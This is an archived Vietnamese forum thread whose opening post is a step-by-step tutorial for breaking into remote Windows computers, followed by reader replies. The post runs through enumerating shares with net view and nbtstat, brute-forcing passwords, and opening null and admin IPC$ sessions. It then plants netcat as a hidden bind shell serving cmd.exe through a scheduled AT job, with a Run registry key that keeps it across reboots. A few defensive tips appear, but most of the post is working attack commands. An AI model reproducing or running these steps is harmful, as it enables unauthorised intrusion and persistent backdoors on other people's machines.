PDA

View Full Version : Kỹ thuật xâm nhập máy tính từ xa


hoangvinh
12-19-2008, 08:37 PM
Kỹ thuật xâm nhập máy tính từ xa
Bài viết này với mục đích chia sẻ,học hỏi,trao đổi kiến thức! Nội dung của bài viết là hack vào PC sử dụng HĐH windows và các phương pháp phòng chống (trong phạm vi kiến thức của tui thôi nha).

Bây giờ chúng ta cùng bắt đầu suy nghĩ những hướng phải đi. Khi bạn Online ( tức kết nối vào Internet) bạn sẽ được ISP gán cho một IP nào đó. Vậy Hacker có biết được IP của bạn không? Câu trả lời là có ( nếu Hacker giao tiếp với bạn,có nghĩa là máy của bạn và máy của hacker có sự kết nối, đồng nghĩa với việc trao đổi các packet,từ các packet có thể biết được địa chi IP nguồn)

Khi biết IP của bạn liệu hacker có thể hack vào máy tính của bạn không? Câu trả lời là hoàn toàn có thể.
Vậy hacker làm như thế nào để Hack?

Hacking thông qua resource share:

Hacker có thể dùng các tool hack tự động ví dụ như : ent3,legion… ( nhưng bản chất của các công cụ này là thưc hiện các bước mà tôi sẽ nói dưới đây 1 cách tự động,chính vì vậy việc dùng các tool này là một cách khá củ chuối …)
Trước tiên Hacker sẽ kiểm tra nhưng tài nguyên được chia sẻ trên máy tính của bạn.
Chỉ bằng vài dòng lệnh đơn giản trên comand line:




CODE

[C:\>Net view \\x.x.x.x ( với x.x.x.x là địa chỉ IP của bạn mà hacker đã biết )

Shared resources at \\x.x.x.x

Share name Type Used as Comment
-------------------------------------------------------------------------------
C Disk
PRJA3 Disk
The command completed successfully.
C:\>



Với Windows 95 & 98 thì khả năng bị hack Cao hơn nhiều so với Windows NT,2000,XP ( vì win 95,98 dùng định dạng FAT&FAT32 có độ bảo mật thấp hơn nhiều so với NTFS)

Đối với hai loại Windows này (95,98) Hacker thậm chí không cần lấy Administrator cũng có thể làm được tất cả ( bạn có tin không ?).
Khuyến cáo : không nên dùng 2 loại win này vì quá lỗi thời và có thể bị hack bất cứ lúc nào.

Sau khi liệt kê các Ổ đĩa,folder share bước tiếp theo của hacker là phải truy cập vào các ổ đĩa,folder đó để lấy dữ liệu (đây cũng là mục đích của hacker).Hacker sẽ ánh sạ ổ đĩa ,thư mục share để truy cập vào.
Cũng bằng command line:


CODE



C:\> net use z: \\x.x.x.x \share
The command completed successfully
.



Chẳng lẽ hack đơn gian vậy sao ? Không , không hề đơn giản như thế bởi vì máy của victim có đặt password ( viêc ánh sạ cần phải biết username & password ).Thế là Hacker pó tay ? không hacker không bao giờ chịu pó tay,hacker sẽ cố gắng lấy username & password
Lấy Username :


CODE


C
:\> Nbtstat –A x.x.x.x

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
ADMIN <00> UNIQUE Registered
BODY <00> GROUP Registered
ADMIN f <20> UNIQUE Registered
BODY <1E> GROUP Registered
BODY <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-08-A1-5B-E3-8C



Vậy máy x.x.x.x sẽ có 2 username là : ADMIN va BODY
Khi đã có username hacker sẽ tiến hành Crack password ( dựa vào các tool như : pqwak,xIntruder) Hoặc Hacker sẽ tiến hành tạo ra một từ điển ( dựa vào khả năng phán đoán của hacker ) tên là : pass.txt


CODE



“” ADMIN
123456 ADMIN
123456 BODY
“” BODY



Sau đó hacker crack bang lệnh :
[/code]
Cũng có thể tạo Userlist.txt và passlist.txt rồi dùng lệnh:


CODE



C:\> FOR /F %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt x.x.x.x.%I>>output.txt


Đối với Win 2000,XP hacker sẽ không là gì nếu không phải administrator chính vì vậy hacker bằng mọi giá sẽ lấy cho được administrator.
nếu lấy được admin thì việc còn lại thì chờ hacker định đoạt.
Khuyến cáo : không nên share gì hết ( trong trường hợp buộc phải share thì nên đặt password phức tạp 1 chút )
Giả sử rằng máy của Victim không share. Vậy hacker làm sao ?

Trong trường hợp này hacker sẽ đoán user & pass (có thể dùng cách ở trên hoặc dung các tool như: user2sid/sid2user,dumpACL,SMBGrind……) sau đó kết nối tới IPC$ ( mặc định share của windows)


CODE



C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator”
The command completed successfully.

Trong trường hợp không thê đoán Đươc user & pass hacker có thể thiết lập một Null session tới máy victim:


CODE


C:\> net use \\x.x.x.x\IPC$ “” /user:””
The command completed successfully

Và rồi nếu victim permission không đúng sẽ có nhưng hậu quả khôn lường.

khuyến cáo : Vô hiệu hoá NetBios ( Bấm vào My Network Places chọn Local Area Connetion, chọn TCP/ IP sau đó bấm vào propperties chọn Advandce, chọn WINS và bấm vào Disable NetBIOS over TCP / IP), Dùng firewall chặn 1 số port không cần thiết , khoá tài khoản sau 1 số lần đăng nhập thất bại .

Tiện đây cũng nói thêm về điều khiển từ xa ( vì có nhiều bạn đột nhập được vào rùi mà không biết phải làm sao )

Giả sử rằng bạn đã có username,password của admin của máy victim rồi:
giờ thiết lập 1 phiên làm viêc:



CODE


C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator”
The command completed successfully.



Sau đó ta cần copy backdoor để điều khiển máy victim có rất nhiều loại backdoor nhưng tôi thấy hơn cả vẫn là : netcat ( nc)
chép nc vào máy victim



CODE

C
:\>copy nc.exe \\x.x.x.x\ADMIN$\nc.exe
The command completed successfully.
1 file copies

Chạy service Schedule trên máy victim ( có service này mới thực thi đ ươc các file trên máy victim, mặc đinh khi cài win sẽ chạy service này)




CODE

C:\> sc \\x.x.x.x start schedule
service_name : schedule


Bây giờ kiểm tra giờ trên máy victim



CODE


C:\> net time \\x.x.x.x

Current time at \\10.0.0.31 is 6/29/2005 4:50 AM

The command completed successfully.



Bây giờ chạy netcat ở chế độ ẩn lắng nghe cổng 111:



CODE


C:\>AT \\x.x.x.x 4:55 /interactive “c:\windows\nc.exe” –L –d –p111 –e cmd.exe

Added a new job with job ID = 1

đợi đến 4:55 rồi chạy thử nc.exe



CODE


C:\>nc –nvv x.x.x.x 111

(UNKNOWN) [x.x.x.x] 111 (?) open
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\windows>


Bây giờ làm gì thì tuỳ nha ( nhưng đừng có phá hoại người ta nhe’)
Vấn đề là làm sao cho những lần sau victim bật máy tính lên netcat tự động chạy và lắng nghe mệnh lệnh của ta?
Bạn có thể cho netcat khởi động cùng windows. "moi" file netcat.reg (dùng notepad và save lại thành .reg) có nội dung như sau:



CODE


Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run]
"netcat"="\"C:\\nc\\nc.exe\" -L -d -p111 -e cmd.exe"


Sau đó copy sang máy victim và chạy nha!
Hy vọng mọi người đừng phá hoại nha ! Thân

Tác giả: ZENO-HVAOnline



Đó chỉ là bài dịch thôi Có gì mong các bạn chỉ bảo thêm nha

tuananhk42
02-28-2009, 12:38 PM
khó hiểu quá pác chả hướng dẫn cụ thể j cả có hình mới dễ làm chứ

hoangvinh
02-28-2009, 12:48 PM
bạn đã thực hiện như hướng dẫn chưa?

nightsky_hp
06-28-2009, 12:51 AM
Địa chỉ IP của mình là 192.168.100.6

Bạn thử thâm nhập vào đc hok ???

lehuuqn
06-28-2009, 07:13 AM
Địa chỉ IP của mình là 192.168.100.6

Bạn thử thâm nhập vào đc hok ???

IP này là IP thiết lập trong mạng lan , HP vào trang showmyip.com để coi IP chính xác của máy mình trên mạng nha

[k]a[p]a
06-28-2009, 07:19 AM
IP này là IP thiết lập trong mạng lan , HP vào trang showmyip.com để coi IP chính xác của máy mình trên mạng nha
Việc xâm nhập này chỉ thông qua spyware thôi ai bị dính con này chưa nếu dính rồi thì biết, hacker có thể thâm nhập và share bất kỳ ổ đĩa naò trên máy tính của bạn.Hi code bị 1 lần rồi anh em có gì pM chode để có thêm thông tin.Nếu máy có soft diệt vi rut pro một tý thì khó bị nhiễm con này.

VLV87
06-30-2009, 12:12 PM
hjhjhj.cái này chi hack những người ko biết sài vi tính thôi.vì đỉa chỉ ip của mổi máy tính được nhà cung cấp qua modem cua nhà cung cấp mạng.vì có thể nói
hack như thế là đưa link vào pc của người ta.và vô tình người ta chạy chuong trinh đó nhầm chia sẻ dử liệu cho kẻ muốn đột nhập.vì thế mình ko chạy file đó thì hack đó pó tay thôi

quangtrong72
02-17-2010, 04:27 PM
số Ip wan của em là 123.28.85.232 máy anh thử điều khiển máy em thử nha. Em rất thích những kiến thức liên quan đến mạng. Sẵn cho em làm quen với máy anh luôn.
Trọng xin cám ơn!

quangtrong72
02-17-2010, 04:29 PM
àh em có trang web tự tạo sơ xài lắm, mấy anh ai rảnh giúp em chỉnh sữa và chỉ cho em biết cách làm như vậy luôn nha. cám ơn
www.besttrong.99k.org (http://www.besttrong.99k.org)

quangtrong72
02-17-2010, 04:34 PM
anh Hoàng Vinh cho Trọng mail đi nha? nếu có anh gặp được lời nhắn này thì gứi qua cho em qua gmail quangtrong72@gmail.com

Anh Fenny
02-17-2010, 08:57 PM
Hiểu gì chết liền tại chỗ.Mà mình làm những thứ này có được gì đâu!

viet113119
02-22-2010, 06:52 AM
kỹ thuật này tuy ko cũ nhưng cũng ko quá mới với dân cntt !!!

các cách trên chỉ có thể đánh vào các máy tính có độ bảo mật yếu của win 98,95, (xp thì hên xui ah )người sử dụng máy có share dữ liệu và chương trình phòng chống tường lửa mà thôi !!!

khi lướt web mặc dù chậm mà chắc nên các bạn hãy chịu khó bật tường lửa hoặc kiếm chương trình bảo mật nào có tường lửa để sử dụng nha !!!

cám ơn bạn đã viết bài viết trên !!!

frank
02-22-2010, 09:30 PM
Vậy nếu như redirect qua 1 proxy server thì làm thế nào tìm dc IP ?

xuong kho
03-16-2010, 06:08 PM
tui đã biết ít về máy tính rồi mà vị này lại nói rườm rà quá,khiến tui k thể làm theo dc.thiệt là đau đầu quá.muốn học hỏi mà xem ra khó quá